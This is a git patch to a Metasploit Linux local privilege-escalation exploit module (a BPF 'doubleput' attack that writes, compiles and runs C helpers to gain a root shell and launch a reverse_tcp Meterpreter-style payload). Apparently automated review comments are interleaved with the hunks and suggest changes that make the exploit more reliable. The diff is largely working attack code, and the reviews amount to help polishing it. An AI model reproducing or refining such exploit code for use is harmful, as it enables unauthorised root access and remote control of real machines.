From 2c4a069e328e74f69996087b9c5be581feb2dc1e Mon Sep 17 00:00:00 2001
From: h00die
Date: Sun, 9 Oct 2016 09:40:44 -0400
Subject: [PATCH] prepend fork fix
---
 modules/exploits/linux/local/bpf_priv_esc.rb | 46 ++------------------
 1 file changed, 4 insertions(+), 42 deletions(-)
diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb
index ef1d8e6536..6d7d829967 100644
--- a/modules/exploits/linux/local/bpf_priv_esc.rb
+++ b/modules/exploits/linux/local/bpf_priv_esc.rb
@@ -4,8 +4,6 @@
 ##
 require 'msf/core'
-require 'msf/core/exploit/local/linux_kernel'
-require 'msf/core/exploit/local/linux'
 class MetasploitModule < Msf::Exploit::Local
 Rank = GoodRanking
@@ -13,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::File
 include Msf::Exploit::FileDropper
- include Msf::Exploit::Local::Linux
 def initialize(info={})
 super( update_info( info, {
@@ -47,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
 'DefaultOptions' => {
 'payload' => 'linux/x64/mettle/reverse_tcp',
+ 'PrependFork' => true,
 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through
 },
 'DefaultTarget' => 1,
@@ -134,20 +132,6 @@ class MetasploitModule < Msf::Exploit::Local
 register_file_for_cleanup(file_path)
 end
- doubleput_sc = Metasm::ELF.new(@cpu)
- #@include_search_path = ['/usr/include/c++/6']
- #@@include_search_path = ['/usr/include/c++/6']
- #include_search_path = ['/usr/include/c++/6']
- #doubleput_sc.parse %Q|
- # #define DEBUGGING
- # #define NULL ((void*)0)
- # #ifdef __ELF__
- # .section ".bss" rwx
- # .section ".text" rwx
- # .entrypoint
- # #endif
- #|
-
 doubleput = %q{
 #define _GNU_SOURCE
 #include
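Review bot: Dropping `require 'msf/core/exploit/local/linux'` here, together with `include Msf::Exploit::Local::Linux` in the next hunk, removes the only visible thing that brings that mixin's helpers into the module, so any call to one of them elsewhere in the file (the `check` and `exploit` bodies lie outside these hunks) would now surface as a NoMethodError at run time instead of a load-time failure. Whether the mixin was actually unused cannot be confirmed from the lines shown. If it was, a one-line comment or commit-message sentence saying so would make the removal reviewable; if it was not, the `include` should stay even though the explicit `require` lines can go.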
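Review bot: The new `'PrependFork' => true` default carries no explanation, while the neighbouring `'WfsDelay' => 60` line does, and the commit title "prepend fork fix" is the only hint at why forking is required. Presumably it is so the payload detaches from the helper process that `execl`s it (the `return execl("#{payload_path}", "", NULL);` substitution in the last hunk), but that reasoning is not visible here and should be confirmed. A trailing comment on the new line, in the style of the WfsDelay one, would spare the next reader a trip through git history: `'PrependFork' => true, # payload must fork away from the helper that execs it, otherwise the session blocks`.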
@@ -288,33 +272,11 @@ class MetasploitModule < Msf::Exploit::Local
 sleep(1);
 }
 fputs("suid file detected, launching rootshell...\n", stderr);
- #execl("./suidhelper", "suidhelper", NULL);
- exit(0);
+ execl("./suidhelper", "suidhelper", NULL);
 err(1, "execl suidhelper");
 }
 }
- cparser.parse(doubleput, 'doubleput.c', path = '/usr/include/c++/6')
- # This will give you all the structs and #defines (from all included
- # headers) that are actually used by our C code so we can avoid
- # needing them at runtime.
- puts cparser.factorize
-
- asm = cpu.new_ccompiler(cparser, doubleput_sc).compile
- doubleput_sc.parse asm
- doubleput_sc.assemble
-
- begin
- elf = doubleput_sc.encode_string
- rescue
- print_error "Metasm Encoding failed: #{$!}"
- elog "Metasm Encoding failed: #{$!.class} : #{$!}"
- elog "Call stack:\n#{$!.backtrace.join("\n")}"
- return
- end
- return
-
 suid_helper = %q{
 #include
 #include
@@ -501,8 +463,8 @@ class MetasploitModule < Msf::Exploit::Local
 # make our substitutions so things are dynamic
 suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/, "return execl(\"#{payload_path}\", \"\", NULL);")
 #launch our payload, and do it in a return to not freeze the executable
- #doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
- # 'exit(0);')
+ doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
+ 'exit(0);')
 print_status('Writing files to target')
 cmd_exec("cd #{datastore['WritableDir']}")
 upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
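Review bot: The `doubleput.gsub!` that rewrites the now-live `execl("./suidhelper", "suidhelper", NULL);` line (made real in the previous hunk) into `exit(0);` discards its return value, and `gsub!` returns nil when nothing matched; if the C source and the regex ever drift apart, the module would silently keep the real `execl`, which runs the helper from whatever working directory the doubleput process happens to have. The `.` in `".\/suidhelper"` is also unescaped, so the pattern is looser than the string it is meant to pin. Checking the result makes the coupling between the two hunks explicit and fails early: `fail_with(Failure::Unknown, 'doubleput execl stub not found') unless doubleput.gsub!(/execl\("\.\/suidhelper", "suidhelper", NULL\);/, 'exit(0);')`. Note that after the substitution the following `err(1, "execl suidhelper");` in the C source is unreachable, which is harmless but worth a comment. The enclosing method begins and ends outside this hunk.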